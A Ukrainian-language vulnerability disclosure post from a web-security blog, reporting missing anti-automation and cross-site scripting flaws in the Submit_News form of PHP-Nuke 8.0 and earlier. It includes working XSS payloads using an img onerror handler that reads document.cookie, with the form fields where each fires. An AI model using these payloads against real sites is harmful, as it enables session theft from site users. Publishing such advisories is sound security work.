Websecurity - Веб безпека

14.01.2011

У жовтні, 26.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в PHP-Nuke. Які я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

09.03.2011

Insufficient Anti-automation:

http://site/modules.php?name=Submit_News

В формі немає захисту від автоматизованих запитів (капчі).

XSS:

http://site/modules.php?name=Submit_News

"><img src='’ onerror="javascript:alert(document.cookie)

В полі Тема.

<img src='’ onerror="javascript:alert(document.cookie)">

В полях Анотація та Основний текст статті. Спрацює при використанні TinyMCE в формі.

Уразливі PHP-Nuke 8.0 та попередні версії.

This entry was posted on 15:06 09.03.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.